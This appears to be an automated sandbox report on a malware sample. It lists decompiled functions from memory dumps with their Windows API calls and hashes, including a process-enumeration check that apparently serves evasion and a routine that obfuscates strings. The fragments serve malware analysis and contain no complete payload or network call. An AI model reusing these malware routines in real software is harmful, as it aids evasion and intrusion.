                                                                                                                                                                                                                                                                                    0x00a74db0
                                                                                                                                                                                                                                                                                    0x00a74db0
                                                                                                                                                                                                                                                                                    0x00a74db3
                                                                                                                                                                                                                                                                                    0x00a74db5
                                                                                                                                                                                                                                                                                    0x00a74db8
                                                                                                                                                                                                                                                                                    0x00a74db8
                                                                                                                                                                                                                                                                                    0x00a74dbf
                                                                                                                                                                                                                                                                                    0x00a74dc5
                                                                                                                                                                                                                                                                                    0x00a74dc5

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00A73EC5,74666F53,00000000,?,00000000,?,?,00A72F4F), ref: 00A719A6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71970: lstrcpy.KERNEL32(00000000,00000000), ref: 00A719CA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71970: lstrcat.KERNEL32(00000000,00000000), ref: 00A719D2
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00A7A2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00A77338,?,?,?), ref: 00A74D14
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72A03: HeapFree.KERNEL32(00000000,00000000,00A74072,00000000,?,?,00000000,?,?,?,?,?,?,00A744AE,00000000), ref: 00A72A0F
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,00A77338,00000000,?,00000000,?,00A77338,?,?,?,?,?,?,?,00A71C40), ref: 00A74D72
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00A77338,?,?,?), ref: 00A74DA0
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00A77338,?,?,?), ref: 00A74DB8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 73268831-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 69f970fd48f53f762416be2ec5e8c80e349b14dae45d35f03ee41299a89fb88c
                                                                                                                                                                                                                                                                                    • Instruction ID: 5c6a721005b3416b2b9e583748253401a729ca107fd73e382cd5b42ce8a37039
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69f970fd48f53f762416be2ec5e8c80e349b14dae45d35f03ee41299a89fb88c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6921B5326007226BD7319BA89D44B9B73E9BF5C751F05C225FE8D97292EB70CC428691
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                                                                                                                                                                    			E00A77289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                                                                    				signed int* _t39;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t36 = __ecx;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				_v12 = _a4;
                                                                                                                                                                                                                                                                                    				_t38 = E00A72616(__ecx,  &_v32);
                                                                                                                                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					_t39 = _a8;
                                                                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                                                                    					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                    						_t23 =  &(_t39[1]);
                                                                                                                                                                                                                                                                                    						if(_t39[1] != 0) {
                                                                                                                                                                                                                                                                                    							E00A728B8(_t23);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return _t38;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(E00A74380(0x40,  &_v16) != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t40 = CreateEventA(0xa7a2d4, 1, 0,  *0xa7a394);
                                                                                                                                                                                                                                                                                    				if(_t40 != 0) {
                                                                                                                                                                                                                                                                                    					SetEvent(_t40);
                                                                                                                                                                                                                                                                                    					Sleep(0xbb8);
                                                                                                                                                                                                                                                                                    					CloseHandle(_t40);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_push( &_v32);
                                                                                                                                                                                                                                                                                    				if(_a12 == 0) {
                                                                                                                                                                                                                                                                                    					_t29 = E00A77360(_t36);
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_t29 = E00A7202E(_t36);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t41 = _v16;
                                                                                                                                                                                                                                                                                    				_t38 = _t29;
                                                                                                                                                                                                                                                                                    				if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    					E00A73EFA(_t41);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t39 = _a8;
                                                                                                                                                                                                                                                                                    					_t38 = E00A74CD5( &_v32, _t39);
                                                                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00A7A2D4,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00A71C40,?,00000001), ref: 00A772DA
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,00A71C40,?,00000001,00A72F7D,00000002,?,?,00A72F7D), ref: 00A772E7
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8,?,?,?,?,00A71C40,?,00000001,00A72F7D,00000002,?,?,00A72F7D), ref: 00A772F2
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00A71C40,?,00000001,00A72F7D,00000002,?,?,00A72F7D), ref: 00A772F9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A77360: WaitForSingleObject.KERNEL32(00000000,?,?,?,00A77319,?,00A77319,?,?,?,?,?,00A77319,?), ref: 00A7743A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A77360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00A77319,?,?,?,?,?,00A71C40,?), ref: 00A77462
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 467273019-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 83707c62904b48c5286718169d06f9e70d54aab4688f2b6a7ae7c732fbf38b9c
                                                                                                                                                                                                                                                                                    • Instruction ID: b93d9998c2488fe77b1847f06330a9f37956d3361ab53b16981b4d4b392a62ba
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83707c62904b48c5286718169d06f9e70d54aab4688f2b6a7ae7c732fbf38b9c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F218473D04219ABDF20AFE48C859EE73BDAB44350B45C425FA1DEB140DB74DD429BA1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E00A74138(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                                                                                                    				signed short _t23;
                                                                                                                                                                                                                                                                                    				char* _t27;
                                                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    				unsigned int _t33;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    				unsigned int _t38;
                                                                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t42 = __eax;
                                                                                                                                                                                                                                                                                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                                                                                                    				_t38 = __eax;
                                                                                                                                                                                                                                                                                    				_t30 = RtlAllocateHeap( *0xa7a290, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                                                                                                    				_v12 = _t30;
                                                                                                                                                                                                                                                                                    				if(_t30 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = _t42;
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						_t33 = 0x18;
                                                                                                                                                                                                                                                                                    						if(_t38 <= _t33) {
                                                                                                                                                                                                                                                                                    							_t33 = _t38;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t21 =  *0xa7a2a8; // 0x11ba88e3
                                                                                                                                                                                                                                                                                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                                                                                                    						 *0xa7a2a8 = _t23;
                                                                                                                                                                                                                                                                                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                                                                                                    						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                                                                                                    						_v8 = _v8 + _t45;
                                                                                                                                                                                                                                                                                    						_t27 = _t30 + _t45;
                                                                                                                                                                                                                                                                                    						_t38 = _t38 - _t45;
                                                                                                                                                                                                                                                                                    						_t46 = _t46 + 0xc;
                                                                                                                                                                                                                                                                                    						 *_t27 = 0x2f;
                                                                                                                                                                                                                                                                                    						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                                                                                                    						_t30 = _t13;
                                                                                                                                                                                                                                                                                    					} while (_t38 > 8);
                                                                                                                                                                                                                                                                                    					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A75B76,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A74143
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A7415B
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,05569630,-00000008,?,?,?,00A75B76,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A7419F
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000001,05569630,00000001,00A76301,00000000,05569630), ref: 00A741C0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1819133394-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 24480dd76763ed09297e93fbc42ed2c203ae6cb1f67dfca3bb431013eafb730a
                                                                                                                                                                                                                                                                                    • Instruction ID: 0f5f9e3a796ad4cae976a820d12227639169f34a0b70f34abe4201c07e272fcf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24480dd76763ed09297e93fbc42ed2c203ae6cb1f67dfca3bb431013eafb730a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B110672A00114BFC710DBA9DC84D9FBBBEDBD5361B058266F80DD7161EB709E8587A0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                    			E00A749BA(char* __eax) {
                                                                                                                                                                                                                                                                                    				char* _t8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                                                                    				char* _t21;
                                                                                                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                                                                                                    				char* _t24;
                                                                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t21 = __eax;
                                                                                                                                                                                                                                                                                    				_push(0x20);
                                                                                                                                                                                                                                                                                    				_t23 = 1;
                                                                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t8 = StrChrA();
                                                                                                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t23 = _t23 + 1;
        _push(0x20);
        _push( &(_t8[1]));
    }
    _t12 = E00A75C4E(_t23 << 2);
     *((intOrPtr*)(_t27 + 0x10)) = _t12;
    if(_t12 != 0) {
        StrTrimA(_t21, 0xa792c4);
        _t26 = 0;
        do {
            _t24 = StrChrA(_t21, 0x20);
            if(_t24 != 0) {
                 *_t24 = 0;
                _t24 =  &(_t24[1]);
                StrTrimA(_t24, 0xa792c4);
            }
             *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
            _t26 = _t26 + 1;
            _t21 = _t24;
        } while (_t24 != 0);
         *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
    }
    return 0;
}











APIs
• StrChrA.SHLWAPI(?,00000020,00000000,0556962C,?,?,?,00A76072,0556962C,?,?,00A72F44), ref: 00A749D4
• StrTrimA.SHLWAPI(?,00A792C4,00000002,?,?,?,00A76072,0556962C,?,?,00A72F44), ref: 00A749F3
• StrChrA.SHLWAPI(?,00000020,?,?,?,00A76072,0556962C,?,?,00A72F44,?,?,?,?,?,00A744F9), ref: 00A749FE
• StrTrimA.SHLWAPI(00000001,00A792C4,?,?,?,00A76072,0556962C,?,?,00A72F44,?,?,?,?,?,00A744F9), ref: 00A74A10
Memory Dump Source
• Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
Similarity
• API ID: Trim
• String ID:
• API String ID: 3043112668-0
• Opcode ID: af453868ebe2326bf9651cd3b4fafc6faf9272a10c07702227a9485e52fd44d3
• Instruction ID: 4e9b88f6c824e3912e8e9ac84545d818e8349dd53baab583e3e4398671c52113
• Opcode Fuzzy Hash: af453868ebe2326bf9651cd3b4fafc6faf9272a10c07702227a9485e52fd44d3
• Instruction Fuzzy Hash: A30196726453117BD321DF659C49F2B7A98EB9ABA0F11C519F589C7240E760880186A5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 53%
E00A71970(intOrPtr _a4, intOrPtr _a8) {
    char _v20;
    void* _t8;
    void* _t13;
    void* _t16;
    char* _t18;
    void* _t19;

    _t19 = 0x27;
    _t1 =  &_v20; // 0x74666f53
    _t18 = 0;
    E00A7354E(_t8, _t1);
    _t16 = E00A75C4E(_t19);
    if(_t16 != 0) {
        _t3 =  &_v20; // 0x74666f53
        _t13 = E00A7756E(_t3, _t16, _a8);
        if(_a4 != 0) {
            __imp__(_a4);
            _t19 = _t13 + 0x27;
        }
        _t18 = E00A75C4E(_t19);
        if(_t18 != 0) {
             *_t18 = 0;
            if(_a4 != 0) {
                __imp__(_t18, _a4);
            }
            __imp__(_t18, _t16);
        }
        E00A72A03(_t16);
    }
    return _t18;
}










                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7756E: wsprintfA.USER32 ref: 00A775CA
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00A73EC5,74666F53,00000000,?,00000000,?,?,00A72F4F), ref: 00A719A6
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00A719CA
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00A719D2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                    • String ID: Soft
                                                                                                                                                                                                                                                                                    • API String ID: 393707159-3753413193
                                                                                                                                                                                                                                                                                    • Opcode ID: 5dce5fc56271d86f46296d4423ccd5e5c2ac1cffbbfa099fda3a0bc65d85741a
                                                                                                                                                                                                                                                                                    • Instruction ID: dbc28b8ff7f61e63d80a6b05e756276408e2b03e269e66a4b7f1fbfbb4cfff53
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dce5fc56271d86f46296d4423ccd5e5c2ac1cffbbfa099fda3a0bc65d85741a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B201D132500209BBCB227BA99C85FEF3EADAF84391F05C426FA0C95111DB748987C7E1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E00A719E7() {
                                                                                                                                                                                                                                                                                    				char _v264;
                                                                                                                                                                                                                                                                                    				void* _v300;
                                                                                                                                                                                                                                                                                    				int _t8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                                                                    				int _t15;
                                                                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t15 = 0;
                                                                                                                                                                                                                                                                                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                                                                                    				if(_t17 != 0) {
                                                                                                                                                                                                                                                                                    					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                                                                                                    					while(_t8 != 0) {
                                                                                                                                                                                                                                                                                    						_t9 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    						_t2 = _t9 + 0xa7be04; // 0x73617661
                                                                                                                                                                                                                                                                                    						_push( &_v264);
                                                                                                                                                                                                                                                                                    						if( *0xa7a11c() != 0) {
                                                                                                                                                                                                                                                                                    							_t15 = 1;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                                                                    						CloseHandle(_t17);
                                                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L8:
                                                                                                                                                                                                                                                                                    				return _t15;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A719F7
                                                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 00A71A0A
                                                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 00A71A36
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A71A45
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 79cc69ab6352e6c8b0f9ad00df7b72a9d84b412865c8d58cbc50ec60d6047a74
                                                                                                                                                                                                                                                                                    • Instruction ID: 00abcffd1936bc6f490c8890a14d4ab753edee226d812b560a42d97e296f07e7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79cc69ab6352e6c8b0f9ad00df7b72a9d84b412865c8d58cbc50ec60d6047a74
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99F030766021246AE720A76A9D49EEB76FCEBD5350F00C161F94ED2101EA209E8786B1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E6E05146C() {
                                                                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                                                    				long _t5;
                                                                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t8 =  *0x6e0541b0;
                                                                                                                                                                                                                                                                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    				 *0x6e0541bc = _t1;
                                                                                                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t3 = GetVersion();
                                                                                                                                                                                                                                                                                    				if(_t3 <= 5) {
                                                                                                                                                                                                                                                                                    					_t4 = 0x32;
                                                                                                                                                                                                                                                                                    					return _t4;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					 *0x6e0541ac = _t3;
                                                                                                                                                                                                                                                                                    					_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                                    					 *0x6e0541a8 = _t5;
                                                                                                                                                                                                                                                                                    					 *0x6e0541b0 = _t8;
                                                                                                                                                                                                                                                                                    					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                                                                    					 *0x6e0541a4 = _t6;
                                                                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                                                                    						 *0x6e0541a4 =  *0x6e0541a4 | 0xffffffff;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0517B8,73B763F0,00000000), ref: 6E05147B
                                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 6E05148A
                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 6E051499
                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0514B2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 845504543-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bc9079dbe920206525bea962aabf025604a249567bf963f7d334f0d46ea17963
                                                                                                                                                                                                                                                                                    • Instruction ID: 531187bab72e9b062dfb684982b792fcbe5083937ac4a7727a072defc4854279
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc9079dbe920206525bea962aabf025604a249567bf963f7d334f0d46ea17963
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F09A30646B10BFEF808FB9AF197823BE0F70AB11F00101AF106C92C4D3B044628F88
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

